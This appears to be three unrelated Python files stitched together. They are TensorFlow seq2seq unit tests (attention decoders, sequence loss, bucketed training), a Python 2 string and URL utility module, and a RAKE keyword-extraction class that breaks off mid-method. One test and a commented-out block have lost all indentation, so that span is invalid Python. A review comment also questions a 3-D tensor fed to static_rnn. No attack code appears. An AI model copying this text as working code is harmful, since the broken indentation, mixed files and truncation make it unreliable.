    """attention_decoder with a 2-layer LSTM and tuple state."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        single_cell = lambda: core_rnn_cell_impl.BasicLSTMCell(  # pylint: disable=g-long-lambda
            2, state_is_tuple=True)
        cell_fn = lambda: core_rnn_cell_impl.MultiRNNCell(  # pylint: disable=g-long-lambda
            cells=[single_cell() for _ in range(2)], state_is_tuple=True)
        cell = cell_fn()
        inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
        enc_outputs, enc_state = core_rnn.static_rnn(
            cell, inp, dtype=dtypes.float32)
        attn_states = array_ops.concat([
            array_ops.reshape(e, [-1, 1, cell.output_size]) for e in enc_outputs
        ], 1)
        dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
        # Use a new cell instance since the attention decoder uses a
        # different variable scope.
        dec, mem = seq2seq_lib.attention_decoder(
            dec_inp, enc_state, attn_states, cell_fn(), output_size=4)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 4), res[0].shape)
        res = sess.run([mem])
        # Two LSTM layers, each with a (c, h) pair of shape (2, 2).
        self.assertEqual(2, len(res[0]))
        self.assertEqual((2, 2), res[0][0].c.shape)
        self.assertEqual((2, 2), res[0][0].h.shape)
        self.assertEqual((2, 2), res[0][1].c.shape)
        self.assertEqual((2, 2), res[0][1].h.shape)
  def testDynamicAttentionDecoderStateIsTuple(self):
    """attention_decoder with a 2-layer LSTM, tuple state, 3-D encoder input."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        cell_fn = lambda: core_rnn_cell_impl.MultiRNNCell(  # pylint: disable=g-long-lambda
            cells=[core_rnn_cell_impl.BasicLSTMCell(2) for _ in range(2)])
        cell = cell_fn()
        inp = constant_op.constant(0.5, shape=[2, 2, 2])
        # NOTE(review): inp is a 3-D Tensor fed to core_rnn.static_rnn, while
        # the other "Dynamic" tests use rnn.dynamic_rnn — confirm this is
        # intentional.
        enc_outputs, enc_state = core_rnn.static_rnn(
            cell, inp, dtype=dtypes.float32)
        attn_states = array_ops.concat([
            array_ops.reshape(e, [-1, 1, cell.output_size])
            for e in enc_outputs
        ], 1)
        dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
        # Use a new cell instance since the attention decoder uses a
        # different variable scope.
        dec, mem = seq2seq_lib.attention_decoder(
            dec_inp, enc_state, attn_states, cell_fn(), output_size=4)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 4), res[0].shape)
        res = sess.run([mem])
        # Two LSTM layers, each with a (c, h) pair of shape (2, 2).
        self.assertEqual(2, len(res[0]))
        self.assertEqual((2, 2), res[0][0].c.shape)
        self.assertEqual((2, 2), res[0][0].h.shape)
        self.assertEqual((2, 2), res[0][1].c.shape)
        self.assertEqual((2, 2), res[0][1].h.shape)
  def testEmbeddingAttentionDecoder(self):
    """embedding_attention_decoder over int32 symbols with output_size=3."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
        cell_fn = lambda: core_rnn_cell_impl.GRUCell(2)
        cell = cell_fn()
        enc_outputs, enc_state = core_rnn.static_rnn(
            cell, inp, dtype=dtypes.float32)
        # Stack the per-step encoder outputs into (batch, steps, output_size).
        attn_states = array_ops.concat([
            array_ops.reshape(e, [-1, 1, cell.output_size]) for e in enc_outputs
        ], 1)
        dec_inp = [
            constant_op.constant(
                i, dtypes.int32, shape=[2]) for i in range(3)
        ]
        # Use a new cell instance since the attention decoder uses a
        # different variable scope.
        dec, mem = seq2seq_lib.embedding_attention_decoder(
            dec_inp,
            enc_state,
            attn_states,
            cell_fn(),
            num_symbols=4,
            embedding_size=2,
            output_size=3)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 3), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].shape)
  def testEmbeddingAttentionSeq2Seq(self):
    """embedding_attention_seq2seq: tuple/non-tuple state and external
    projection (feed_previous checks are disabled below)."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        enc_inp = [
            constant_op.constant(
                1, dtypes.int32, shape=[2]) for i in range(2)
        ]
        dec_inp = [
            constant_op.constant(
                i, dtypes.int32, shape=[2]) for i in range(3)
        ]
        cell_fn = lambda: core_rnn_cell_impl.BasicLSTMCell(2)
        cell = cell_fn()
        dec, mem = seq2seq_lib.embedding_attention_seq2seq(
            enc_inp,
            dec_inp,
            cell,
            num_encoder_symbols=2,
            num_decoder_symbols=5,
            embedding_size=2)
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        self.assertEqual((2, 5), res[0].shape)
        res = sess.run([mem])
        self.assertEqual((2, 2), res[0].c.shape)
        self.assertEqual((2, 2), res[0].h.shape)

        # Test with state_is_tuple=False.
        with variable_scope.variable_scope("no_tuple"):
          cell_fn = functools.partial(
              core_rnn_cell_impl.BasicLSTMCell,
              2, state_is_tuple=False)
          cell_nt = cell_fn()
          dec, mem = seq2seq_lib.embedding_attention_seq2seq(
              enc_inp,
              dec_inp,
              cell_nt,
              num_encoder_symbols=2,
              num_decoder_symbols=5,
              embedding_size=2)
          sess.run([variables.global_variables_initializer()])
          res = sess.run(dec)
          self.assertEqual(3, len(res))
          self.assertEqual((2, 5), res[0].shape)
          res = sess.run([mem])
          # Concatenated (c, h) state: 2 * cell size.
          self.assertEqual((2, 4), res[0].shape)

        # Test externally provided output projection.
        w = variable_scope.get_variable("proj_w", [2, 5])
        b = variable_scope.get_variable("proj_b", [5])
        with variable_scope.variable_scope("proj_seq2seq"):
          dec, _ = seq2seq_lib.embedding_attention_seq2seq(
              enc_inp,
              dec_inp,
              cell_fn(),
              num_encoder_symbols=2,
              num_decoder_symbols=5,
              embedding_size=2,
              output_projection=(w, b))
        sess.run([variables.global_variables_initializer()])
        res = sess.run(dec)
        self.assertEqual(3, len(res))
        # With an external projection the raw cell output (size 2) is returned.
        self.assertEqual((2, 2), res[0].shape)

        # TODO(ebrevdo, lukaszkaiser): Re-enable once RNNCells allow reuse
        # within a variable scope that already has a weights tensor.
        #
        # # Test that previous-feeding model ignores inputs after the first.
        # dec_inp2 = [
        #     constant_op.constant(
        #         0, dtypes.int32, shape=[2]) for _ in range(3)
        # ]
        # with variable_scope.variable_scope("other"):
        #   d3, _ = seq2seq_lib.embedding_attention_seq2seq(
        #       enc_inp,
        #       dec_inp2,
        #       cell_fn(),
        #       num_encoder_symbols=2,
        #       num_decoder_symbols=5,
        #       embedding_size=2,
        #       feed_previous=constant_op.constant(True))
        # sess.run([variables.global_variables_initializer()])
        # variable_scope.get_variable_scope().reuse_variables()
        # cell = cell_fn()
        # d1, _ = seq2seq_lib.embedding_attention_seq2seq(
        #     enc_inp,
        #     dec_inp,
        #     cell,
        #     num_encoder_symbols=2,
        #     num_decoder_symbols=5,
        #     embedding_size=2,
        #     feed_previous=True)
        # d2, _ = seq2seq_lib.embedding_attention_seq2seq(
        #     enc_inp,
        #     dec_inp2,
        #     cell,
        #     num_encoder_symbols=2,
        #     num_decoder_symbols=5,
        #     embedding_size=2,
        #     feed_previous=True)
        # res1 = sess.run(d1)
        # res2 = sess.run(d2)
        # res3 = sess.run(d3)
        # self.assertAllClose(res1, res2)
        # self.assertAllClose(res1, res3)
  def testOne2ManyRNNSeq2Seq(self):
    """one2many_rnn_seq2seq: two decoders with different lengths/vocabularies,
    plus feed_previous equivalence on decoder "0"."""
    with self.test_session() as sess:
      with variable_scope.variable_scope(
          "root", initializer=init_ops.constant_initializer(0.5)):
        enc_inp = [
            constant_op.constant(
                1, dtypes.int32, shape=[2]) for i in range(2)
        ]
        dec_inp_dict = {}
        dec_inp_dict["0"] = [
            constant_op.constant(
                i, dtypes.int32, shape=[2]) for i in range(3)
        ]
        dec_inp_dict["1"] = [
            constant_op.constant(
                i, dtypes.int32, shape=[2]) for i in range(4)
        ]
        # Decoder "0" emits 5 symbols; decoder "1" emits 6.
        dec_symbols_dict = {"0": 5, "1": 6}
        cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=True)
        outputs_dict, state_dict = (seq2seq_lib.one2many_rnn_seq2seq(
            enc_inp, dec_inp_dict, cell, 2, dec_symbols_dict, embedding_size=2))
        sess.run([variables.global_variables_initializer()])
        res = sess.run(outputs_dict["0"])
        self.assertEqual(3, len(res))
        self.assertEqual((2, 5), res[0].shape)
        res = sess.run(outputs_dict["1"])
        self.assertEqual(4, len(res))
        self.assertEqual((2, 6), res[0].shape)
        res = sess.run([state_dict["0"]])
        self.assertEqual((2, 2), res[0].c.shape)
        self.assertEqual((2, 2), res[0].h.shape)
        res = sess.run([state_dict["1"]])
        self.assertEqual((2, 2), res[0].c.shape)
        self.assertEqual((2, 2), res[0].h.shape)

        # Test that previous-feeding model ignores inputs after the first, i.e.
        # dec_inp_dict2 has different inputs from dec_inp_dict after the first
        # time-step.
        dec_inp_dict2 = {}
        dec_inp_dict2["0"] = [
            constant_op.constant(
                0, dtypes.int32, shape=[2]) for _ in range(3)
        ]
        dec_inp_dict2["1"] = [
            constant_op.constant(
                0, dtypes.int32, shape=[2]) for _ in range(4)
        ]
        with variable_scope.variable_scope("other"):
          outputs_dict3, _ = seq2seq_lib.one2many_rnn_seq2seq(
              enc_inp,
              dec_inp_dict2,
              cell,
              2,
              dec_symbols_dict,
              embedding_size=2,
              feed_previous=constant_op.constant(True))
        sess.run([variables.global_variables_initializer()])
        variable_scope.get_variable_scope().reuse_variables()
        outputs_dict1, _ = seq2seq_lib.one2many_rnn_seq2seq(
            enc_inp,
            dec_inp_dict,
            cell,
            2,
            dec_symbols_dict,
            embedding_size=2,
            feed_previous=True)
        outputs_dict2, _ = seq2seq_lib.one2many_rnn_seq2seq(
            enc_inp,
            dec_inp_dict2,
            cell,
            2,
            dec_symbols_dict,
            embedding_size=2,
            feed_previous=True)
        res1 = sess.run(outputs_dict1["0"])
        res2 = sess.run(outputs_dict2["0"])
        res3 = sess.run(outputs_dict3["0"])
        self.assertAllClose(res1, res2)
        self.assertAllClose(res1, res3)
  def testSequenceLoss(self):
    """sequence_loss under the three averaging modes.

    All 5 logits within a step are equal, so the per-step cross-entropy is
    ln(5) ~= 1.60944; per-sequence (3 steps) ~= 4.828314; total over the
    batch of 2 ~= 9.656628.
    """
    with self.test_session() as sess:
      logits = [constant_op.constant(i + 0.5, shape=[2, 5]) for i in range(3)]
      targets = [
          constant_op.constant(
              i, dtypes.int32, shape=[2]) for i in range(3)
      ]
      weights = [constant_op.constant(1.0, shape=[2]) for i in range(3)]

      average_loss_per_example = seq2seq_lib.sequence_loss(
          logits,
          targets,
          weights,
          average_across_timesteps=True,
          average_across_batch=True)
      res = sess.run(average_loss_per_example)
      self.assertAllClose(1.60944, res)

      average_loss_per_sequence = seq2seq_lib.sequence_loss(
          logits,
          targets,
          weights,
          average_across_timesteps=False,
          average_across_batch=True)
      res = sess.run(average_loss_per_sequence)
      self.assertAllClose(4.828314, res)

      total_loss = seq2seq_lib.sequence_loss(
          logits,
          targets,
          weights,
          average_across_timesteps=False,
          average_across_batch=False)
      res = sess.run(total_loss)
      self.assertAllClose(9.656628, res)
def testSequenceLossByExample(self):
with self.test_session() as sess:
output_classes = 5
logits = [
constant_op.constant(
i + 0.5, shape=[2, output_classes]) for i in range(3)
]
targets = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(3)
]
weights = [constant_op.constant(1.0, shape=[2]) for i in range(3)]
average_loss_per_example = (seq2seq_lib.sequence_loss_by_example(
logits, targets, weights, average_across_timesteps=True))
res = sess.run(average_loss_per_example)
self.assertAllClose(np.asarray([1.609438, 1.609438]), res)
loss_per_sequence = seq2seq_lib.sequence_loss_by_example(
logits, targets, weights, average_across_timesteps=False)
res = sess.run(loss_per_sequence)
self.assertAllClose(np.asarray([4.828314, 4.828314]), res)
# TODO(ebrevdo, lukaszkaiser): Re-enable once RNNCells allow reuse
# within a variable scope that already has a weights tensor.
#
# def testModelWithBucketsScopeAndLoss(self):
# """Test variable scope reuse is not reset after model_with_buckets."""
# classes = 10
# buckets = [(4, 4), (8, 8)]
# with self.test_session():
# # Here comes a sample Seq2Seq model using GRU cells.
# def SampleGRUSeq2Seq(enc_inp, dec_inp, weights, per_example_loss):
# """Example sequence-to-sequence model that uses GRU cells."""
# def GRUSeq2Seq(enc_inp, dec_inp):
# cell = core_rnn_cell_impl.MultiRNNCell(
# [core_rnn_cell_impl.GRUCell(24) for _ in range(2)])
# return seq2seq_lib.embedding_attention_seq2seq(
# enc_inp,
# dec_inp,
# cell,
# num_encoder_symbols=classes,
# num_decoder_symbols=classes,
# embedding_size=24)
# targets = [dec_inp[i + 1] for i in range(len(dec_inp) - 1)] + [0]
# return seq2seq_lib.model_with_buckets(
# enc_inp,
# dec_inp,
# targets,
# weights,
# buckets,
# GRUSeq2Seq,
# per_example_loss=per_example_loss)
# # Now we construct the copy model.
# inp = [
# array_ops.placeholder(
# dtypes.int32, shape=[None]) for _ in range(8)
# ]
# out = [
# array_ops.placeholder(
# dtypes.int32, shape=[None]) for _ in range(8)
# ]
# weights = [
# array_ops.ones_like(
# inp[0], dtype=dtypes.float32) for _ in range(8)
# ]
# with variable_scope.variable_scope("root"):
# _, losses1 = SampleGRUSeq2Seq(
# inp, out, weights, per_example_loss=False)
# # Now check that we did not accidentally set reuse.
# self.assertEqual(False, variable_scope.get_variable_scope().reuse)
# with variable_scope.variable_scope("new"):
#         _, losses2 = SampleGRUSeq2Seq(
#             inp, out, weights, per_example_loss=True)
#       # First loss is scalar, the second one is a 1-dimensional tensor.
# self.assertEqual([], losses1[0].get_shape().as_list())
# self.assertEqual([None], losses2[0].get_shape().as_list())
  def testModelWithBuckets(self):
    """Larger test that does full sequence-to-sequence model training."""
    # We learn to copy 10 symbols in 2 buckets: length 4 and length 8.
    classes = 10
    buckets = [(4, 4), (8, 8)]
    perplexities = [[], []]  # Results for each bucket.
    random_seed.set_random_seed(111)
    random.seed(111)
    np.random.seed(111)
    with self.test_session() as sess:
      # We use sampled softmax so we keep output projection separate.
      w = variable_scope.get_variable("proj_w", [24, classes])
      w_t = array_ops.transpose(w)
      b = variable_scope.get_variable("proj_b", [classes])

      # Here comes a sample Seq2Seq model using GRU cells.
      def SampleGRUSeq2Seq(enc_inp, dec_inp, weights):
        """Example sequence-to-sequence model that uses GRU cells."""

        def GRUSeq2Seq(enc_inp, dec_inp):
          cell = core_rnn_cell_impl.MultiRNNCell(
              [core_rnn_cell_impl.GRUCell(24) for _ in range(2)],
              state_is_tuple=True)
          return seq2seq_lib.embedding_attention_seq2seq(
              enc_inp,
              dec_inp,
              cell,
              num_encoder_symbols=classes,
              num_decoder_symbols=classes,
              embedding_size=24,
              output_projection=(w, b))

        # Targets are decoder inputs shifted by one (plus a trailing 0 pad).
        targets = [dec_inp[i + 1] for i in range(len(dec_inp) - 1)] + [0]

        def SampledLoss(labels, inputs):
          # sampled_softmax_loss expects labels shaped [batch_size, 1].
          labels = array_ops.reshape(labels, [-1, 1])
          return nn_impl.sampled_softmax_loss(
              weights=w_t,
              biases=b,
              labels=labels,
              inputs=inputs,
              num_sampled=8,
              num_classes=classes)

        return seq2seq_lib.model_with_buckets(
            enc_inp,
            dec_inp,
            targets,
            weights,
            buckets,
            GRUSeq2Seq,
            softmax_loss_function=SampledLoss)

      # Now we construct the copy model.
      batch_size = 8
      inp = [
          array_ops.placeholder(
              dtypes.int32, shape=[None]) for _ in range(8)
      ]
      out = [
          array_ops.placeholder(
              dtypes.int32, shape=[None]) for _ in range(8)
      ]
      weights = [
          array_ops.ones_like(
              inp[0], dtype=dtypes.float32) for _ in range(8)
      ]
      with variable_scope.variable_scope("root"):
        _, losses = SampleGRUSeq2Seq(inp, out, weights)
        updates = []
        params = variables.all_variables()
        optimizer = adam.AdamOptimizer(0.03, epsilon=1e-5)
        # Build one clipped-gradient update op per bucket.
        for i in range(len(buckets)):
          full_grads = gradients_impl.gradients(losses[i], params)
          grads, _ = clip_ops.clip_by_global_norm(full_grads, 30.0)
          update = optimizer.apply_gradients(zip(grads, params))
          updates.append(update)
      sess.run([variables.global_variables_initializer()])
      steps = 6
      for _ in range(steps):
        bucket = random.choice(np.arange(len(buckets)))
        length = buckets[bucket][0]
        # Random input symbols in [1, 9]; 0 is reserved as "GO".
        i = [
            np.array(
                [np.random.randint(9) + 1 for _ in range(batch_size)],
                dtype=np.int32) for _ in range(length)
        ]
        # 0 is our "GO" symbol here.
        o = [np.array([0] * batch_size, dtype=np.int32)] + i
        feed = {}
        for i1, i2, o1, o2 in zip(inp[:length], i[:length], out[:length],
                                  o[:length]):
          feed[i1.name] = i2
          feed[o1.name] = o2
        if length < 8:  # For the 4-bucket, we need the 5th as target.
          feed[out[length].name] = o[length]
        res = sess.run([updates[bucket], losses[bucket]], feed)
        perplexities[bucket].append(math.exp(float(res[1])))
      for bucket in range(len(buckets)):
        if len(perplexities[bucket]) > 1:  # Assert that perplexity went down.
          self.assertLess(perplexities[bucket][-1],  # 10% margin of error.
                          1.1 * perplexities[bucket][0])
  def testModelWithBooleanFeedPrevious(self):
    """Test the model behavior when feed_previous is True.

    For example, the following two cases have the same effect:

    - Train `embedding_rnn_seq2seq` with `feed_previous=True`, which contains
      a `embedding_rnn_decoder` with `feed_previous=True` and
      `update_embedding_for_previous=True`. The decoder is fed with "<Go>"
      and outputs "A, B, C".

    - Train `embedding_rnn_seq2seq` with `feed_previous=False`. The decoder
      is fed with "<Go>, A, B".
    """
    num_encoder_symbols = 3
    num_decoder_symbols = 5
    batch_size = 2
    num_enc_timesteps = 2
    num_dec_timesteps = 3

    def TestModel(seq2seq):
      # Runs one training step on two copies of `seq2seq` (feed_previous
      # True vs. False) with synchronized variables and identical effective
      # decoder inputs, then asserts their variables stay equal.
      with self.test_session(graph=ops.Graph()) as sess:
        random_seed.set_random_seed(111)
        random.seed(111)
        np.random.seed(111)
        enc_inp = [
            constant_op.constant(
                i + 1, dtypes.int32, shape=[batch_size])
            for i in range(num_enc_timesteps)
        ]
        dec_inp_fp_true = [
            constant_op.constant(
                i, dtypes.int32, shape=[batch_size])
            for i in range(num_dec_timesteps)
        ]
        # Placeholders so the feed_previous=False model can be fed the
        # symbols the feed_previous=True model actually produced.
        dec_inp_holder_fp_false = [
            array_ops.placeholder(
                dtypes.int32, shape=[batch_size])
            for _ in range(num_dec_timesteps)
        ]
        targets = [
            constant_op.constant(
                i + 1, dtypes.int32, shape=[batch_size])
            for i in range(num_dec_timesteps)
        ]
        weights = [
            constant_op.constant(
                1.0, shape=[batch_size]) for i in range(num_dec_timesteps)
        ]

        def ForwardBackward(enc_inp, dec_inp, feed_previous):
          # Builds the model in its own variable scope plus an Adam update
          # op restricted to that scope's variables.
          scope_name = "fp_{}".format(feed_previous)
          with variable_scope.variable_scope(scope_name):
            dec_op, _ = seq2seq(enc_inp, dec_inp, feed_previous=feed_previous)
            net_variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES,
                                               scope_name)
          optimizer = adam.AdamOptimizer(0.03, epsilon=1e-5)
          update_op = optimizer.minimize(
              seq2seq_lib.sequence_loss(dec_op, targets, weights),
              var_list=net_variables)
          return dec_op, update_op, net_variables

        dec_op_fp_true, update_fp_true, variables_fp_true = ForwardBackward(
            enc_inp, dec_inp_fp_true, feed_previous=True)
        dec_op_fp_false, update_fp_false, variables_fp_false = ForwardBackward(
            enc_inp, dec_inp_holder_fp_false, feed_previous=False)

        sess.run(variables.global_variables_initializer())

        # We only check consistencies between the variables existing in both
        # the models with True and False feed_previous. Variables created by
        # the loop_function in the model with True feed_previous are ignored.
        v_false_name_dict = {
            v.name.split("/", 1)[-1]: v
            for v in variables_fp_false
        }
        matched_variables = [(v, v_false_name_dict[v.name.split("/", 1)[-1]])
                             for v in variables_fp_true]
        # Copy the True-model variables into the False model so both start
        # from identical parameters.
        for v_true, v_false in matched_variables:
          sess.run(state_ops.assign(v_false, v_true))

        # Take the symbols generated by the decoder with feed_previous=True as
        # the true input symbols for the decoder with feed_previous=False.
        dec_fp_true = sess.run(dec_op_fp_true)
        output_symbols_fp_true = np.argmax(dec_fp_true, axis=2)
        dec_inp_fp_false = np.vstack((dec_inp_fp_true[0].eval(),
                                      output_symbols_fp_true[:-1]))
        sess.run(update_fp_true)
        sess.run(update_fp_false, {
            holder: inp
            for holder, inp in zip(dec_inp_holder_fp_false, dec_inp_fp_false)
        })
        # After one identical training step the two models must agree.
        for v_true, v_false in matched_variables:
          self.assertAllClose(v_true.eval(), v_false.eval())

    # Each builder below wraps one library entry point with a tiny LSTM so
    # TestModel can exercise it with both tuple and concatenated state.
    def EmbeddingRNNSeq2SeqF(enc_inp, dec_inp, feed_previous):
      cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=True)
      return seq2seq_lib.embedding_rnn_seq2seq(
          enc_inp,
          dec_inp,
          cell,
          num_encoder_symbols,
          num_decoder_symbols,
          embedding_size=2,
          feed_previous=feed_previous)

    def EmbeddingRNNSeq2SeqNoTupleF(enc_inp, dec_inp, feed_previous):
      cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=False)
      return seq2seq_lib.embedding_rnn_seq2seq(
          enc_inp,
          dec_inp,
          cell,
          num_encoder_symbols,
          num_decoder_symbols,
          embedding_size=2,
          feed_previous=feed_previous)

    def EmbeddingTiedRNNSeq2Seq(enc_inp, dec_inp, feed_previous):
      cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=True)
      return seq2seq_lib.embedding_tied_rnn_seq2seq(
          enc_inp,
          dec_inp,
          cell,
          num_decoder_symbols,
          embedding_size=2,
          feed_previous=feed_previous)

    def EmbeddingTiedRNNSeq2SeqNoTuple(enc_inp, dec_inp, feed_previous):
      cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=False)
      return seq2seq_lib.embedding_tied_rnn_seq2seq(
          enc_inp,
          dec_inp,
          cell,
          num_decoder_symbols,
          embedding_size=2,
          feed_previous=feed_previous)

    def EmbeddingAttentionSeq2Seq(enc_inp, dec_inp, feed_previous):
      cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=True)
      return seq2seq_lib.embedding_attention_seq2seq(
          enc_inp,
          dec_inp,
          cell,
          num_encoder_symbols,
          num_decoder_symbols,
          embedding_size=2,
          feed_previous=feed_previous)

    def EmbeddingAttentionSeq2SeqNoTuple(enc_inp, dec_inp, feed_previous):
      cell = core_rnn_cell_impl.BasicLSTMCell(2, state_is_tuple=False)
      return seq2seq_lib.embedding_attention_seq2seq(
          enc_inp,
          dec_inp,
          cell,
          num_encoder_symbols,
          num_decoder_symbols,
          embedding_size=2,
          feed_previous=feed_previous)

    for model in (EmbeddingRNNSeq2SeqF, EmbeddingRNNSeq2SeqNoTupleF,
                  EmbeddingTiedRNNSeq2Seq, EmbeddingTiedRNNSeq2SeqNoTuple,
                  EmbeddingAttentionSeq2Seq, EmbeddingAttentionSeq2SeqNoTuple):
      TestModel(model)
if __name__ == "__main__":
  # Run every test case defined in this module.
  test.main()
|
# coding: utf-8
import re
import unicodedata
from urllib import quote_plus
class NestedDict(dict):
    """A dict that transparently creates nested NestedDicts on missing keys,
    so arbitrarily deep chained assignments like d[a][b][c] = v just work."""

    def __getitem__(self, key):
        # Return the stored value when present; otherwise create, store
        # and return a fresh empty NestedDict for that key.
        try:
            return dict.__getitem__(self, key)
        except KeyError:
            return self.setdefault(key, NestedDict())
def convert_to_underscore(name):
    """Convert a camelCase/PascalCase identifier to snake_case."""
    # First split an uppercase letter that begins a capitalized word,
    # then split lower/digit-to-upper transitions, then lowercase all.
    step_one = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
    step_two = re.sub('([a-z0-9])([A-Z])', r'\1_\2', step_one)
    return step_two.lower()
def convert_to_camelcase(name):
    """Convert a snake_case identifier to camelCase (a leading
    underscore is preserved)."""

    def _capitalize(match):
        # Drop the underscore, uppercase the letter that followed it.
        return match.group(1).upper()

    return re.sub(r'(?!^)_([a-zA-Z])', _capitalize, name)
def convert_json(d):
    """Recursively rewrite every dict key from camelCase to snake_case.

    Non-dict values are returned unchanged; lists and tuples are walked
    element by element (tuples come back as lists, as before).
    """
    if not isinstance(d, dict):
        return d
    converted = {}
    for key, value in d.items():
        snake_key = convert_to_underscore(key)
        if isinstance(value, (list, tuple)):
            converted[snake_key] = [convert_json(item) for item in value]
        else:
            converted[snake_key] = convert_json(value)
    return converted
def urlencode_utf8(params):
    """URL-encode a mapping or an iterable of (key, value) pairs.

    Each key and value is coerced with the Python 2 `unicode` builtin and
    UTF-8 encoded before quoting; '/' is deliberately left unescaped
    (safe='/').  Returns the joined "k=v&k=v" query string.
    """
    if hasattr(params, 'items'):
        # Accept dict-like objects as well as pair sequences.
        params = params.items()
    return '&'.join(
        (quote_plus(unicode(k).encode('utf8'), safe='/') + '=' + quote_plus(unicode(v).encode('utf8'), safe='/')
         for k, v in params))
def remove_accents(input_str):
    """Strip accents/diacritics from *input_str*.

    NFKD-normalizes the text (Python 2 `unicode`) so accented characters
    decompose into a base character plus combining marks, then drops the
    combining marks.  Returns a unicode string.
    """
    nkfd_form = unicodedata.normalize('NFKD', unicode(input_str))
    return u"".join([c for c in nkfd_form if not unicodedata.combining(c)])
|
# Implementation of RAKE - Rapid Automatic Keyword Extraction algorithm
# as described in:
# Rose, S., D. Engel, N. Cramer, and W. Cowley (2010).
# Automatic keyword extraction from individual documents.
# In M. W. Berry and J. Kogan (Eds.), Text Mining: Applications and Theory. John Wiley and Sons, Ltd.
import re
import operator
debug = False  # when True, print intermediate candidate/score tables below
test = True  # when True, run the built-in demo extraction on import
def is_number(s):
    """Return True when *s* parses as an int (no dot) or float (with dot)."""
    try:
        if '.' in s:
            float(s)
        else:
            int(s)
        return True
    except ValueError:
        return False
def load_stop_words(stop_word_file):
    """
    Utility function to load stop words from a file and return as a list of words
    @param stop_word_file Path and file name of a file containing stop words.
    @return list A list of stop words.
    """
    stop_words = []
    # Use a context manager so the file handle is always closed; the
    # original left the handle open until garbage collection.
    with open(stop_word_file) as handle:
        for line in handle:
            # Skip comment lines (leading '#'); blank lines contribute nothing.
            if line.strip()[0:1] != "#":
                # A line may hold several whitespace-separated words.
                stop_words.extend(line.split())
    return stop_words
def separate_words(text, min_word_return_size):
    """
    Utility function to return all words in *text* whose length exceeds
    *min_word_return_size* characters.
    @param text The text that must be split in to words.
    @param min_word_return_size The minimum no of characters a word must have to be included.
    """
    splitter = re.compile('[^a-zA-Z0-9_\\+\\-/]')
    result = []
    for token in splitter.split(text):
        word = token.strip().lower()
        # Leave numbers in phrases, but don't count them as words, since
        # they tend to invalidate the scores of their phrases.
        if len(word) > min_word_return_size and word != '' and not is_number(word):
            result.append(word)
    return result
def split_sentences(text):
    """
    Utility function to return a list of sentences.
    @param text The text that must be split in to sentences.
    """
    # Sentence boundaries: common punctuation, tab, quotes/brackets,
    # typographic apostrophe/dash, or a dash surrounded by whitespace.
    delimiters = re.compile(u'[.!?,;:\t\\\\"\\(\\)\\\'\u2019\u2013]|\\s\\-\\s')
    return delimiters.split(text)
def build_stop_word_regex(stop_word_file_path):
    """Compile one case-insensitive alternation matching any stop word
    loaded from *stop_word_file_path*."""
    # The look-ahead keeps hyphenated words (e.g. "pre-war") intact.
    word_patterns = [r'\b' + word + r'(?![\w-])'
                     for word in load_stop_words(stop_word_file_path)]
    return re.compile('|'.join(word_patterns), re.IGNORECASE)
def generate_candidate_keywords(sentence_list, stopword_pattern):
    """Split every sentence on stop words and collect the surviving
    lower-cased phrases as keyword candidates."""
    phrase_list = []
    for sentence in sentence_list:
        # Replace each stop word with '|' so phrases fall out of a split.
        marked = re.sub(stopword_pattern, '|', sentence.strip())
        for chunk in marked.split("|"):
            candidate = chunk.strip().lower()
            if candidate != "":
                phrase_list.append(candidate)
    return phrase_list
def calculate_word_scores(phraseList):
    """Score each word as deg(w)/freq(w) across all candidate phrases.

    freq(w) counts occurrences; deg(w) adds, per occurrence, the number of
    co-occurring words in that phrase (RAKE's degree measure).
    """
    word_frequency = {}
    word_degree = {}
    for phrase in phraseList:
        words = separate_words(phrase, 0)
        co_degree = len(words) - 1
        for word in words:
            word_frequency[word] = word_frequency.get(word, 0) + 1
            word_degree[word] = word_degree.get(word, 0) + co_degree
    # deg(w) also counts the word itself once per occurrence.
    for word in word_frequency:
        word_degree[word] = word_degree[word] + word_frequency[word]
    # Calculate word scores = deg(w)/freq(w), as a float.
    return dict((word, word_degree[word] / (word_frequency[word] * 1.0))
                for word in word_frequency)
def generate_candidate_keyword_scores(phrase_list, word_score):
    """Score each candidate phrase as the sum of its member word scores."""
    keyword_candidates = {}
    for phrase in phrase_list:
        total = 0
        for word in separate_words(phrase, 0):
            total = total + word_score[word]
        keyword_candidates[phrase] = total
    return keyword_candidates
class Rake(object):
    """Rapid Automatic Keyword Extraction driven by a stop-word list file."""

    def __init__(self, stop_words_path):
        self.stop_words_path = stop_words_path
        # Pre-compiled case-insensitive alternation of all stop words.
        self.__stop_words_pattern = build_stop_word_regex(stop_words_path)

    def run(self, text):
        """Extract keywords from *text*; returns (phrase, score) pairs
        sorted by descending score (Python 2 iteritems())."""
        sentence_list = split_sentences(text)
        phrase_list = generate_candidate_keywords(sentence_list, self.__stop_words_pattern)
        word_scores = calculate_word_scores(phrase_list)
        keyword_candidates = generate_candidate_keyword_scores(phrase_list, word_scores)
